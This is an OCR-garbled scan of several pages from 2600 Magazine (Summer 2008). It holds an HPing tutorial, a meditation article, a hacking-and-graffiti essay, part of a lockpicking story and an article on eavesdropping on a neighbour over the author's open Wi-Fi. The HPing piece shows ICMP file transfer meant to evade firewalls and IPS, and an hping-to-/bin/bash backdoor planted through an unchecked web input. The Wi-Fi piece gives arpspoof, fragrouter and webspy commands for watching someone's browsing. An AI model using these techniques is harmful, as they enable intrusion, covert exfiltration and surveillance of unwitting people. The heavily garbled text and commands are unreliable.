forget about me" for mysel f, l ater. You can get
h i gh doi ng t hi ngs l i ke these. Bel i eve me.
After th i rteen years of Barata Eletrica, i s
anybody snori ng out there? I t ' s been a great
experi ence, bei ng famous for wri t i ng an ezi ne.
I di d i t most l y because of the readers. What a
feel i ng when you meet someone who got hi s
l i fe changed because of an arti cl e of your s! I
never got l ai d because of i t, but I di d l earn a
l ot about a l ot of topi cs, from publ i c rel ati ons
to l aw and j our nal i sm. Maybe someday, I ' l l get
a job out of i t.
I th i n k everybody shou l d try i t. Someone
sai d that i f you don' t l i ke the news, you shou l d
go out and make some of your own. Every
body can hel p change the wor l d with s i mpl e
gest ures. j ust i nteract wi t h your communi ty. My
ezi ne started l i ke that: a publ i cati on for a few
peopl e usi ng an i nternet-connected computer
l ab nearby. Thi nk about i t.
Summer 2008 Pg
e 19
8 8 8 8 8 8 8 8 8 8 8 8 8b . d8b
8 8 8 8 8 8 8 8 8 Y88b Y8 P
8 8 8 8 8 8 8 8 8 8 8 8
8 8 8 8 8 8 8 8 8 8 8 8 8 d8 8 P 8 8 8 8 8 8 8 8b . . d8 8 b .
8 8 8 8 8 8 8 8 8 8 8 8 8 P " 8 8 8 8 8 8 " 8 8b d8 8 P " 8 8b
8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8
8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 Y 8 8 b 8 8 8
8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 " Y8 8 8 8 8
8 8 8
(The Part lForot) Y8b d8 8 P
I n my l ast art i cl e ("Essenti al Securi ty Tool s,"
2600 Wi nter 2007-2008), I wrote about some
securi ty tool s, tol d readers where to get them, and
gave a basi c i ntroducti on of what they do. Most
astute readers may have noti ced that the secti on
on HPi ng was very bri ef. When I was draft i ng the
art i cl e, I was movi ng subjects around, and so I
mi spl aced the mai n body of my HPi ng sect i on.
When I recei ved my copy of 2600 and noti ced
th i s, I fi rml y pl anted my face i n the pal m of my
hand and l et out a l oud "D' oh ! " To make up for
it and to absol ve mysel f of t hi s error, I am dedi
cati ng th i s art i cl e enti rel y t o t he HPi ng uti l i ty.
HPi ng (ht tp://w. hping . org) is a great
tool to have. You can use i t for very si mpl e tests or
you can set it up to do someth i ng more advanced,
such as transfer fi l es
.
Let ' s start off wi t h the basi c
stuff.
" Y8 8 P "
HPI NG local hos t , 1 C 1 2 7 . 0 . 0 . 1 ) , FPU
- set , 40 headers 0 data bytes
- l en= 4 0 i p= 1 2 7 . 0 . 0 . 1 t t 1 = 6 4 DF i d= O
- sport = 9 9 9 fags = RA seq= O win = O r t t = O . l uC
I n addi ti on to TCP packets, HPi ng can send
UDP. The next exampl e shows UDP packets sent
to port 0, whi ch i s not l i steni ng, on a Check Poi nt
Sofa Ware box:
[ root@doormouse - ] # hping2 2 1 0 . 2 1 0 . 2 1 0 . 1 - 2
HPING 2 1 0 . 2 1 0 . 2 1 0 . 1 ( ethO 2 1 0 . 2 1 0 . 2 1 0 . 1 ) ,
. udp mode set , 2 8 headers 0 data bytes
IeMP Por t Unreachabl e f rom
_ i p= 2 1 0 . 2 1 0 . 2 1 0 . 1 name=my . frewa 1 1
Even though nothi ng i s l i steni ng on that port
on that host, we sti l l know that the I P address i s
al i ve. I t shou l d be noted t hat some fi rewal l soft
ware and operati ng systems wi l l j ust drop these
packets without sendi ng anyth i ng back.
You can even craft packets at the I P l ayer,
though t hi s can be a bi t tri cky, dependi ng on
the protocol you that are attempti ng to use.
I n the tcpdump output shown bel ow, I used
D1 lZ ! CCc!l. ' O -v - H 4 1
"
to send I P
packets to I P protocol 41 , wh i ch i s I Pv6- i n- I Pv4,
HPi n Basics
wi thout any payl oad:
CCl 'CCCnCC-C ] # tcpdump A
HPi ng, at i ts most asi c, i s a packet crafter.
_ ' . 1 ' 1` . 1 ! C proto 4 1
You can get a l ot of use out of j ust t hi s bas i c func-
l CJm : 1 1 . | 1 O Cn 1 C , l i nk- type EN1 0MB
ti on. Let' s exami ne usi ng HPi ng to "pi ng" a TCP
3 m5 5
a
, 0 ` 0
y

es
port:
_ 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , e ther type I Pv4
[ root @doormouse - ] # hping2
( Ox0 8 D D ) , l ength ] 4 , ( tos OxO , ttl 6 4 ,
-1 0c a1 hos t - S -p 2 2
- i d 8 2 5 1 , o f f set 0 , fags [ none ] ,
HPINC 1 CC! lC . | | 1 C 1 2 7 . 0 . 0 . 1 ) , S CCl , proto T o , i ) , l eng t h 2 0 ) 1 2 7 . 0 . 0 . 1
- 4 0 headers 0 data bytes 1 en= 4 4 - . 1 2 7 . 0 . 0 . 1 , [ I i p6 ]
_ i p= 1 2 7 . 0 . 0 . 1 t t 1 = 6 4 DF i d= O spor t = 2 2 O xO O O O , 4 5 0 0 0 0 1 4 2 0 3 b 0 0 0 0 4 0 2 9 5 c 8 4
- fags = SA seq= O win= 3 2 7 9 2 r t t = 0 . 2 ms - 7 f O O 0 0 0 1 E . . . . ; . . @ ) \ . . . . .
I n th i s exampl e, we' ve asked HPi ng to send
O x0 0 1 0 , 0 0 0 1
h I I h TCP/SYN k (
.
h h
1 3 , 3 3 , 0 9 . 0 2 5 6 3 1 0 0 , 0 0 , 0 0 : 0 0 , 0 0 , 0 0 .
t e oca ost pac ets - s) , Wi t t e
_ 0 0 , 0 0 , 0 0 ,
0 0 , 0 0 , 0 0 , ether type I Pv4
desti nati on TCP port set to 22, whi ch i s for ssh.
( Ox 0 8 0 0 ) , l ength 3 4 , ( tos OxO , ttl 6 4 ,
Th I k t t t h rt f
- i d 4 1 9 4 4 , o f f s et 0 , flags [ none ] ,
e rep y pac e s we ge are e next pa I
proto I Pv6 ( 4 1) , length 2 0 ) 1 2 7 . 0 . 0 . 1
the TCP three-way handshake, wi th the SYNI
_ . 1 2 7 . 0 . 0 . 1 , ' i p6 ]
ACK fl ags set. Thi s is i ndi cated i n HPi ng by the
4 5 0 0 0 0 1 4 a3 d8 0 0 0 0 4 0 2 9 d8 e6
flags = SA fi el d. Thi s tel l s us that t he TCP port i s
;
x
g ,



E
o o o i
. . . @) . . . . . .
open and that we are al l owed to access that 1 3 , 3 3 , 1 0 . 0 2 6 0 8 9 0 0 , 0 0 , 0 0 : 0 0 , 0 0 : 0 0 `
TCP port. Th i s is usefu l in test i ng whether or not
- 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , 0 0 , e ther type I Pv4
( Ox0 8 0 0 ) , l ength 3 4 , ( tos OxO , ttl 6 4 ,
your fi rewa l l ru l es are set up properl y. Let ' s say
_ i d 1 8 7 9 1 , o f f s e t 0 , flags [ none ] ,
that you have a web server and that you want
proto I Pv6 ( 4 1 ) , l ength 2 0 ) 1 2 7 . 0 . 0 . 1
to ensure that peopl e from the 10. 20 . 30 . 0124
;
x0
'
. 0 i
P
6 7 0 0 0 0 4 0 2 9 3 3 5 8
network are al l owed to access i t. You can j ust
= 0 0 0 1 E . . . lg . . @ ) 3 X . . . .
HPi ng the server wi th the SYN fl ag set and see i f
O x0 0 1 0 , 7 f 0 0 0 0 0 1
you get a repl y.
The l ast of the basi cs I ' m goi ng to tal k about i s
You can set al l , some, or none of t he TCP fl ags
the abi l i ty to speci fy your source address. Thi s i s
i f you wi sh to check TCP stacks or your I ntrusi on
excel l ent for testi ng anti -spoofi ng features of your
Protecti on System ( I PS) . For exampl e, i f you have
fi rewa l l or to perform "i dl e" scans. I leave that as
an I PS set up and you want to test your fi l ters
a project for you to fi gure out on your own.
agai nst odd TCP fl ag sett i ngs, you can use HPi ng
Now that you know how to craft basi c packets
to do that:
wi th HPi ng, you may start to wonder why you
[ root@doormouse _ ] # hping2
woul d use thi s for anythi ng except port scans or
- localhos t - FPU -p 9 9 9
secur i ty-rel ated measures. I magi ne that you work
Pa
g
e 20 2600 Ma
g
azine
for a managed servi ce provi der and that you
need to mon i tor both system heal th and servi ce
heal th. You can i ncorporate HPi ng i nto your
servi ce heal th mon itori ng by setti ng up a basi c
scri pt wh i ch wi l l craft packets, send them to the
servi ce i n questi on, del i ver a payl oad i f needed,
and then report back to your management stati on
whether or not the servi ce i s up, dependi ng on
the response received by HPi ng.
Advanced Features
One of HPi ng' s ni ce features is the abi l ity
to transfer fi l es across a "pi ng" sessi on. I ' ve
onl y done th i s wi th text fi l es, but I ' m sure that
someone out there knows how to successful l y
transfer a bi nary fi l e l i ke an i mage. Suppose you
have a text fi l e that you need to transfer, but a l l
the normal fi l e transfer opti ons l i ke FTP(S), SFTP/
SCP, and HTTP(S) are bl ocked by a fi rewal l ;
however, I CMP i s al l owed out. You can use HPi ng
to transfer the fi l e across I CMP. Fi rst you wi l l have
to set your target server to be in a l i sten state:
[ root@doormouse - 1 # hpi ng2 J ocal host
. - - l i s ten s i gnature - - s af e - - i cmp
Warning : Unabl e to guess
- the outpu t i nterf ace
hpi ng2 l i s t en mode
[ ma i n ] meml ockal l ( ) : Success
\::.: : ccr l di sable mcm.)y pagi ng !
Now that we have someone l i sten i ng, l et ' s
transfer the fi l e from our source mach i ne:
[ root @doorrOlse temp l # hp i ng2 l ocal hos t
- - i cmp
. - d 1 0 0 - - s i gn s i gnatur e
- -fl e . / randofi . s t u f f
Hl 1' l ocal hos t | 1 C 1 2 7 . 0 . 0 . 1 ) : i cmp
- mode s et , 2 8 headers 1 0 0 data bytes
[ ma i nl mem] ockal l { ) : Success
Warn ing : can ' t di sabl e memory paging !
l en o 1 2 8 i p" 1 2 7 . 0 . 0 . 1 t t l = 6 4 i d= 1 2 7 7 0 i cmp_
seq" O
. r t t = O . 3 ru s
l en" 1 2 8 i p" 1 2 7 . 0 . 0 . 1 t t l " 6 4 i d" 1 2 7 7 3 i cmp_
seq= l
. r t t = O . l ,
l en" 1 2 8 i p" 1 2 7 . 0 . 0 . 1 t t l " 6 4 i d" 1 2 7 7 5 i cmp_
seq=2
- rt t = O . 2 ,
l en " 1 2 8 i p" 1 2 7 . 0 . 0 . 1 t t l " 6 4 i d" 1 2 7 7 7 i cmp_
seqd
. r t t " 0 . 2 ms
- - - l ocal hos t hping s t a t i s t i c - - -
4 packets trami t t ed, 4 packet s
recei ved , 0 % packet l os s
round- tri p mi n/ avg /rax 0 . 1 / 0 . 2 / 0 . 3 ms
The l i sten i ng si de wi l l then show:
hping2 l i s ten mode
[ ma i n] memlockal l ( ) : Success
Warni ng : can ' t di sable memory paging !
Li ne I
Line 2
Li ne J
Li ne 4
End o f Important F i l e
Looks l i ke we managed to transfer our i mpor
tant fi l e successful l y! Most peopl e won ' t si t and
exami ne I CMP l ogs, so you may be abl e to evade
any fi rewa l l or I PS in the way.
Let' s exami ne the same scenari o, except the
l ocati on you are at onl y al l ows CUPS outbound
and does deep packet i nspecti on, so you can' t
re-bi nd your FTP or SFTP server to that port. I
know thi s is far-fetched, but work wi th me on thi s
server on the remote end:
[ root@doormouse ] # net s t at -na
' grep LIST ' grep 6 3 1
tcp 0 0 1 2 7 . 0 . 0 . 1 : 6 3 1
0 . 0 . 0 . 0 : * L I STEN
[ root @doormouse - ] # hping2 l ocal hos t
- - - l i s ten s i gnature - - sa f e - p 6 3 1
Warning : Unabl e t o guess
the output i nt erf ace
hpi ng2 l i s ten mode
[ ma i n] meml ockal l ( ) : Success
Warning : can ' t di sabl e memory paging !
L i ne 1
Line 2
Line 3
Line 4
LiC of Important F i l e
The command to send the fi l e over TCP wi th
no fl ags l ooks l i ke th i s:
[ root@doormouse temp ] # hpi ng2 l ocal host -p
6 3 1
- - d 1 0 0 - - s ign s i gnat ure
- -- fl e . / random . s tu f f
Hl1' l ocal hos t | ! C 1 2 7 . 0 . 0 . 1 ) : NO PLAGS
are set ,
- 4 0 headers 1 0 0 data bytes
[ mai n] meml ocka l l ( ) : Success
Warn i ng : can ' t di sable memor y pagi ng !
l en " 4 0 ip" 1 2 7 . 0 . 0 . 1 t t l " 6 4 F i d o O
spor t = 6 3 1 " fags = RA seq= O wi n= O r t t = O . O rs
Keep i n mi nd that f i l es transferred th i s way are
not encrypted. Al though most peopl e won ' t be
i nspect i ng packets that much, anyone snoopi ng
on the wi re can grab your i nformati on.
You can al so use HPi ng as a back door. Get
the fol l owi ng command runni ng on a remote
host, possi bl y through an i nsecure websi te
wi th an unchecked i nput vari abl e: hping2
1 ethO - - l i s ten s i gnature - p cO
/ bin/bash. Then, use netcat to do some
th i ng l i ke th i s: echo ., s i gnaturereboot ; `
nc . 4 4 4 . O . O O O c O . Anyth i ng after
the word "si gnature" in the echo command
wi l l be processed by the / bin/bash to whi ch
HPi ng' s output i s bei ng pi ped, and so the server
reboots. Try th i s with your own machi nes:
use s i gnature touch remote . touched . fl e;
to see that the l i stener wi l l process what i s
bei ng asked of i t. You won ' t see anyth i ng on
the consol e, but when you stop HPi ng and do a
qu i ck I s , you shoul d now see a new fi l e cal l ed
remote . touched . fle i n the current di rectory.
Another use for th i s techni que i s as a "port
knocker." If you don ' t want to l eave your SSH
daemon up and runni ng a l l the ti me, set up
HPi ng on your SSH server. Whenever you want
to start your SSH daemon, use the command
s i gnatureservice s shd s tart ; .
Conclusion
As you can see, HPi ng is a great tool for both
basi c and more advanced appl i cati ons, and it
can be used i n a vari ety of di fferent ways. I t ' s
excel l ent for hel pi ng peopl e to l ear n how the
I P stack works, especi al l y the TCP fl ag setti ngs,
and i t' s great to use i n or al ong wi th custom
appl i cati ons. The topi cs I ' ve covered here i n thi s
arti cl e are j ust the begi nni ng, and I strongl y urge
you to become fami l i ar wi th thi s powerful tool .
one. You can transfer the fi l e to your server over
Shouts: magikhOe, Ihab, Exial, /ohnPNP and,
CUPS wi thout i nterferi ng wi th the runni ng CUPS
of course, eXoDuS. (YNBABWARLf)
Summer 2008

Pg
e 21
by Sai Emrys
2600@saizai . com
AI M, #ca2600: saizai
GPG: OxAFF1 F292
My experi ence has been that medi ta
ti on i s a subj ect that frequentl y pol ar i zes
peopl e: some bel i eve credul ousl y in al l
ki nds of unsupported nonsense, whi l e some
rej ect everythi ng whol esal e i n the name of
skept i ci sm.
However, medi tati on i s a useful way
to hack your mi nd state. Rather than j ust
taki ng some guru ' s preferred versi on of one
techni que as the One True Way, you j ust
have to get to know a vari ety of the tech
ni ques avai l abl e, tweak them to work for
your own worl d-vi ew and symbol set, and
understand what about them makes them
actual l y work.
I ' ve tal ked wi th a fai r number of peopl e
about t hi s, and one mi sconcept i on that
comes up ofen i s that "medi tati on" excl u
si vel y means "si tt i ng i n a dark, qui et room
in l otus posi ti on smel l i ng i ncense and
thi nki ng about nothi ng. " Thi s i s i ndeed one
method of medi tati on, known as mushin or
"empty mi nd. " I t i s far from the onl y one,
though, and i t ' s not necessari l y the best
fi rst approach for everyone, especi al l y not
for peopl e used to mul ti taski ng, l i ke most
hackers.
Another mi sconcept i on i s that medi ta
ti on is to be treated as somethi ng that you
do onl y i n speci al short peri ods of ti me. Thi s
i mpl i es that most of the t i me you are not i n
a medi tati ve mi nd state, but the whol e poi nt
of medi tati on is to change your everyday
l i fe.
There certai nl y i s a pl ace for separate,
focused medi tati on, but here is one cl ass
of methods I cal l "al l -poi nt" techni ques.
What makes thi s cl ass of methods work i s
the combi nat i on of a very ri ch envi ronment
and the strategy of not concentrat i ng overl y
on any part i cul ar pi ece of i t. These methods
Pg
e 22
are parti cu l ar l y wel l -su i ted to begi nni ng
one' s medi tati on experi ence and to easy,
everyday practi ce.
1. "Sof eyes"
Thi s is a rel ati vel y common techni que i n
mart i al arts.
I nstead of focusi ng on the eyes or hands
of the person you are tal ki ng wi th (or tryi ng
to di sarm) , ai m your eyes towards the neck
area and keep a soft focus, both mental l y
and l i teral l y.
A good way to check t hi s techni que is to
ask yoursel f a seri es of questi ons:
Where i s thei r ri ght hand and what
are they hol di ng?
What i s i n thei r pockets? ( Pnts, chest,
under-arm hol ster, buttocks . . . )
How tense are the muscl es around
and above thei r eyes? Shoul ders?
Neck?
How fast are they breath i ng?
How are they about to move?
Who and what i s nearby? Where i s
t he nearest exi t?
The way to tel l whether you ' re doi ng thi s
r i ght i s t o see i f you can answer al l of these
questi ons wi th onl y mi ni mal , i f any, move
ment of your eyes and attenti on; you shou l d
be abl e t o see al l of i t s i mul taneousl y.
Thi s is not an excl usi vel y mart i al tech
ni que, though i t ' s certai nl y useful for that;
try j ust doi ng it wi th everyone you see.
The poi nt is to be abl e to noti ce as much
as possi bl e, wi thout tel egraphi ng what you
are l ooki ng at and wi thout havi ng your
attenti on excl usi vel y focused on one t hi ng.
Magi ci ans and fi ghters both l i ke i t when
they can use mi sdi recti on to make you not
noti ce t hi ngs whi ch are wi thi n your si ght.
2. Really enjoyi ng nature
Go somewhere you ' l l fi nd beauti fu l . I ' l l
use h i l l s a s a n exampl e si nce that ' s what I
most enj oy, but anythi ng vi brant wi l l work.
Normal l y, when most peopl e go to
2600 Ma
g
azine
"enj oy nature," they ei ther barel y noti ce i t
at a l l because they' re di stracted by equ i p
ment, thei r l atest argument, pl anni ng the
next day' s work, etc. ; they noti ce one spot
l i ghted bi t at a ti me; or they not i ce onl y a
very vague ambi ance.
I nstead, try to i ndi vi dual l y see every
t hi ng i n deta i l .
An easy way to do th i s i s to start by
l i mi t i ng your attent i on to two t hi ngs; for
exampl e, feel i ng wi nd on your ski n and
seei ng t he cl ouds move. See as much detai l
as you can i n those two t hi ngs. Then add
a thi rd, such as the feel of sunl i ght or the
movement of a patch of grass nearby.
The key l i es i n addi ng more t hi ngs to
your attenti on s i mu l taneousl y wi thout
l osi ng detai l i n the previ ousl y percei ved
ones. Thi s can very qui ckl y become over
whel mi ng; the amount of i nformati on i n
any natural scene i s extremel y dense. Even
a smal l patch of grass wi l l have enough
movement and detai l i n i t to swamp your
mu l ti threadi ng.
Fortunatel y, thi s i s a l earnabl e ski l l .
Wi th practi ce, you ' l l fi nd that your efecti ve
t hreadcount and buffer si ze go up.
As a ni ce bonus, t he more you can real l y
noti ce, t he more enj oyabl e i t i s .
3. I ndividuals in crowds
What di d you noti ce the l ast t i me you
wal ked down the street?
I t ' s i nterest i ng that the amount you
rel ate to peopl e as i ndi vi dual s tends to be
i nversel y rel ated to the number of peopl e
present. Crowds gai n a separate character
of thei r own: i t ' s easi er to si mpl y i nterpret
them as a mass. Thi s is al so true in reverse;
bei ng a member of a crowd makes one l ess
apt to empathi ze wi th others as i ndi vi dual s.
Look up t he case of Ki tty Genovese for one
sad exampl e.
Next t i me you are out, try t o noti ce
faces, body posture, and the di stances
peopl e stand from each other, rather than
gl azi ng over. Don ' t attach too much to each
personal drama; j ust noti ce, recogni ze, and
keep movi ng.
The goal for thi s i s to i ncrease the scope
of t hi ngs whi ch you can take i n consci ousl y,
maki ng a "mere" wal k down the street a
somewhat more al i ve experi ence. For more
on recogni zi ng faci al emoti ons, I h i ghl y
recommend the work of Pul Ekman, and
for more on the si gni fi cance of proxi mi ty
i n human i nteracti on, I recommend The
Hidden Dimension and The Silent Lan
g
ua
g
e,
both by Edward T. Hal l .
Concl usion
There are many other si tuati ons i n whi ch
you can pract i ce th i s " al l -poi nt" tech ni que:
wh i l e pl ayi ng RTSs and other games wi th
l ots of t hi ngs happen i ng at once; wh i l e
l i sten i ng t o compl ex mu l t i - part musi c
such as Rachman i noff, Bach, or Godspeed
You ! Bl ack Emperor; whi l e noti c i ng a l l
the background sounds wherever you are,
i ncl udi ng computer fans, hard dri ve cl i cks,
traffi c, your own breath i ng, radi os, nei gh
bors, and so on; or wh i l e experi enci ng any
envi ronment.
The purpose of thi s cl ass of techni ques
is to l earn to be abl e to deal wi th h i ghl y
mul ti threaded, content-r i ch, real -ti me si tu
ati ons i n a serene manner, so you can not
onl y experi ence as much of these s i tuati ons
as possi bl e but al so do so wi thout bei ng
overwhel med. Thi s i s a l ot l i ke t he eventual
purpose of tradi ti onal empty-mi nd medi ta
ti on; i t ' s j ust a di fferent approach. I ' ve gi ven
j ust a few of doi ng thi s. I t' s up to you to
fi gure out one that ' l l be effecti ve for you i n
your dai l y l i fe. The more that you can i nte
grate th i s way of i nteracti ng wi th the wor l d
as a dai l y habi t, the mor e efecti ve i t ' l l be at
shi fi ng your basel i ne mi nd state.
I f you have any feedback on t hi s or are
i nterested i n seei ng more, pl ease contact
me. I ' m worki ng on a book tentati vel y enti
tl ed A Hacker 's Guide to Meditation: Prac
tical Recipes Without the Dogma, whi ch
ai ms t o be a compl ete gui de t o al l known
cl asses of efecti ve medi ati on techni ques
of whi ch thi s art i cl e di scusses j ust one
from a pragmati c, open-source perspec
ti ve. Thi s i ncl udes techni ques tradi ti onal l y
taught as medi tati on, psychotherapy, and
more. I f you fi nd th i s useful , or i f you have a
techni que or vari ant I mi ght not have heard
of, I ' d l i ke to know.
Happy mi nd-hacki ng!
Sai Emrys i s a recent graduate of
UC Berkeley in cognitive science, looking
to do doctoral work in the neuroscience
of empathy. Other interests include
running the Language Creation Conference
(conlangs . berkel ey . edu), interpreting
music in American Sign Language (YouTube
saizai), coding in Ruby on Rails, and
consulting on international business.
Summer 2008 Pg
e 2
3
DOc
wD D G
DODC
QD D wc
DDDDDC
[ DDQDO
by Uriah C.
I enj oy l eavi ng my wi rel ess access poi nt
ava i l abl e for others to connect to and use t he
I nternet. There i s one cat ch, however: I get t o
pl ay and moni tor t he traffi c whenever I want
t o. I n t hi s arti cl e, I wi l l descri be a past i me
t hat i s fu n and reveal i ng of your nei ghbors.
I recent l y fou n d a new host on my network
to pl ay wi t h. New fri ends are fun ! I frequent l y
use EtherApe to qu i ckl y moni tor my n etwork
traffi c, and I fou n d a new computer name
on my network. Knowi ng t hat t h i s person
was on my network, I fi red up n map to do
a qu i ck pi n g sweep to confi rm my new
fr i end. My new fr i end ' s computer name was
her rea l name, and I cou l d see t hat s he had
t he I P address of 192 . 168. 1.104. The fami l y
computer was on 192. 168. 1. 103, my l aptop
was on 192 . 168.1. 101, and the access poi nt
was on 192 . 168. 1. 1.
Si nce I had a new fri end to p l ay wi th, I
deci ded to vi ew t he traffi c that was goi n g
through. Of course I cou l d do that wi t h
EtherApe, but I wanted more t hen j u st I P
addresses a n d URLs. Besi des, I was i tch i ng
to use t he program webspy for a l i ttl e bi t .
Before I go i nto t he fun t oo much, l et
me expl a i n what webspy i s . Webspy i s a
program t hat i s part of Doug Song' s ds ni ff
s u i te. These tool s are desi gned to penetra
t i on test your n etwork, and, i n my case, h ave
fun wi th those on my n etwork. I mu st stress
that t h i s s houl d on l y be done on your own
network or on one that you h ave been gi ven
per mi s s i on to preform s uch tests . Now t hat
t he l egal stuff i s out of t he way, l et's get on
wi t h t he fun .
The fi rst thi ng I have to do i s to AR P poi son
the host and the gateway. Thi s way, the traffi c
wi l l be routed to my computer. Th i s i s done
by open i ng two termi nal wi ndows.
In the fi rst termi nal , type:
# arpspoo f - i eth1 -t
192 .1 68.1.1 192.168.1.1 0 4
I n t he s econd termi n a l , t ype:
# arpspoo f -i eth1 - t
1 9 2 . 1 6 8 . 1 . 1 0 4 1 9 2 . 1 6 8 . 1 . 1
Then , I n eed to make s ure t hat I am
forwardi n g traff i c to t he proper l ocat i on s,
s o I u se fra grouter. I n a t h i rd termi n a l ,
type:
# fragrouter -i e th1 - B1
Now l et ' s see wh at t h i s does . The
fi rst arpspoo f c omma n d s ends forged
arp i n format i o n over the i nterface ( - i)
eth1 to the target ( - t) 192 . 168. 1. 1
t hat my computer i s 192 . 168. 1. 104,
wh i l e the secon d termi n a l tel l s the target
192 . 168. 1. 104 t hat my computer i s
192 . 168. 1. 1. Mea n wh i l e, fra grouter s ends
t he broadcast a ddress ( - B1 ) a l l traff i c t hat
h a s come i n, s o t here i s n o i nterr upt i on of
servi ce.
N ow, i t ' s t i me for t he l a st few steps . I
n eed to r u n web s py a n d open a brows er.
Then , I c a n h ave t he f un of s ee i n g whatever
someon e e l se sees. So, I wou l d open u p
two more termi na l s . I n t he fourt h termi n a l ,
t ype:
# webspy -i e th1 1 9 2 . 1 6 8 . 1 . 1 0 4
And, fi n a l l y, i n t he f i ft h termi n a l , t ype:
# fre fox
N ow, F i refox opens u p, a n d I get to see
the websi tes that my new fr i end opens up
i n real ti me. I ' ve onl y seen one probl em:
i f an ad pops up on a separate page from
the rest of a webs i te, i t ' l l be shown sepa
ratel y from the rest of the or i gi nal si te. So,
i f my fr i end goes to MySpace, then I see
MySpace, but it qui ckl y fl ashes over to
show j ust the a d wi t hout the rest of the
si te. I h ave my browser set to open these
ads i n di fferent tabs, so I can see the page
and the ad.
You never know what ki nd
of si tes others may vi si t, s o you
shou l d do t hi s wi t h di screti on
especi al l y i f the ki ds are runni ng around
the house and the mater i al comi ng up i s
quest i onabl e.
Pg
e 24
2600 Ma
g
azine
. A 4

by scOut64
scOut64@yahoo.ca
I fi nd that one of my l ongest- run n i ng
fasci nati ons, computer hacki ng, has a l ot
to do wi t h my greatest passi on and hobby,
graffi ti art. These are two very controversi al
s ubj ects, and di scussi ng t hem can usua l l y
generate a great response, dependi ng on who
you ask. Thi s i s not a how-to arti cl e by any
means, but rather a way to shed some l i ght
on the s i mi l ari t i es between two of my favor i te
pasti mes. But I ' l l sti l l i ncl ude t he standard
di scl ai mer that gett i ng caught parti ci pat i ng
i n ei t her of these acti vi ti es mi ght get you i n
troubl e.
The fi rst t hi ng I can fi nd these two s ubj ects
have i n common i s the react i on that you get
when you tel l someone that you do one or the
other. I f you tel l someone you ' re a computer
hacker, you can usual l y expect confused or
wary l ooks. Peopl e assume that you ' ve done
shady t hi ngs before, and they approach
conversat i on choos i ng thei r words carefu l l y,
assumi ng that you mi ght take some of the
i nformati on and use i t agai nst t hem. They
mi ght not be aware that the hacki ng you do
mi ght be compl etel y l ega l . You mi ght be a
pen tester for a secur i ty fi rm, or you j ust mi ght
l i ke run n i ng wargames on your networ k wi t h
your fri ends. I t depends on your defi n i t i on of
a hacker.
S i mi l ar l y, when you tel l someone
t hat you ' re a graffi ti arti st, s ome peopl e
automati cal l y assume that you ' re a vandal .
They thi n k you ' re one o f those stereotypi cal
guys who tags up conveni ence stores at
ni ght, or t hat you ' re one of the peopl e who
vandal i zed a l l t hose New Yor k Ci ty trai ns
years ago. They mi ght thi n k that your bedroom
i s a mess and that a l l your school books are
scri bbl ed on. They may not rea l i ze that there
are pl enty of l egal areas to tag up and that
what you do fal l s compl etel y wi th i n the l aw,
or that you mi ght be a graphi c desi gn student
whose styl e i s compl etel y di gi ta l . I t depends
on your defi n i t i on of graffi t i .
Another s i mi l ari ty between these two
Yor k Ci ty. Yes, it caused a l l ki nds of chaos,
and many peopl e were penal i zed once the
ci ty i mpl emented graffi ti l aws. L i ke many
great thi ngs, because it was new and brought
change, peopl e di dn' t l i ke i t. Li kewi se,
when hacki ng started becomi ng extremel y
popu l ar, there were no l aws or governi ng
bodi es t o regul ate what went on. Wi th these
two cu l t ures and many others, once the
gover nment fel t t hi ngs got a l i ttl e too out of
control , they stepped i n and "supervi sed. "
There are a n umber of ot her s i mi l ar i t i es
between the t wo fi el ds:

Some ways of parti ci pati ng i n these

act i vi t i es are i l l egal and carry penal ti es
of var i ous ki nds.

You need permi ssi on for parti ci pat i on to

be l ega l . You can' t j ust Own your fr i end' s
bOx a n y more t han you c a n tag up hi s
room; you need t o have an OK from h i m
fi rst.

There are contests. These are great

for i ntel l ectual sti mul at i on, l ear n i ng,
meet i ng new peopl e, and chal l engi ng
yoursel f.

There are a l ot of graffi ti -based themes i n

computer hacki ng a n d i n vi deo games.
Cl an tags and s i gs have gotten very, very
cool .

Dependi ng on who you ask, both can be

consi dered ei ther vanda l i s m and cr i me
or art and expressi on.

An i nterest i n ei ther fi el d can l ead to a

great career.

Somet i mes, both pract i ces i nvol ve goi ng

pl aces you ' re not supposed t o go.

Somet i mes, you have to come back to the

same pl aces to fi ni s h what you started.
There are more s i mi l ar i ti es, but you get the
i dea. Graffi ti and hacki ng have evol ved i nto
di sti nct cul t ures; j ust l i ke every cu l t ure, you
have good peopl e and bad peopl e. Peopl e
come and go, but the cul t ure survi ves. Legal
or not, these acti vi t i es wi l l sti l l go on. The
questi on sti l l remai ns: how wi l l you represent
your cul ture?
areas i s l ega l i ty. Graffi t i wri ti ng rea l l y came
Shouts: Adict, Kiwi,
i nto popul ari ty i n the 70s and 80s i n New www. worldwideblackbookproject.com
Summer 2008
Pa
g
e 25
Hacker Perspective
Barry Wc| s
The story bel ow i s my youth confes- much deeper u nt i l reach i ng t he shel
s i on. I n a way I am a l i ttl e rel uctant t o tel l ters. I must say i t was qu i te a t hr i l l goi ng
i t, but s i nce i t i s a story over 2 0 years ol d. . . deeper underground t han most peopl e
I j ust hope you wi l l s ee i t i n i t s r i ghtfu l knew was poss i bl e - not t o ment i on t he
perspecti ve. spooky atmosphere i n t he shel ter. Deep
Normal l y when peopl e ask where my bel ow t he s ubway stati on were hundreds
i nterest i n l ocks and l ockpi cki ng comes of packaged bunk beds and many wei rd
from, my answer is t hat I became fasci - machi nes and other i nteresti ng t hi ngs.
nated watchi ng J ames Bond movi es as a Needl ess to say th i s master key had a
ki d, wonder i ng i f l ocks real l y cou l d be magi cal attract i on to me. I j ust had t o
opened t hat s i mpl y. Now t hat i n i tsel f i s get a copy of i t ! And even t hough my
a t r ue statement . But t he one th i ng t hat fr i end tol d me he had a l ready t r i ed to get
real l y ser i ous l y moti vated me, and made i t copi ed and had concl uded t hat i t was
me put a l ot of creati ve energy i nto l ocks tru l y i mposs i bl e, I knew I cou l d do i t .
and c i rcumvent i ng some secur i ty features, I qu i ckl y l ear ned t hat even t hough
was somet h i ng el se. . . . t he key l ooked l i ke a standard key, i t had
As l ong as I can remember, I was several copy protect i on features . And
i nterested i n l ocks and ways of open i ng i nstead of t he standard fi ve pi ns, thi s one
t hem. And as a ki d, I was eager t o l ear n had seven. The key profi l e was h i ghl y
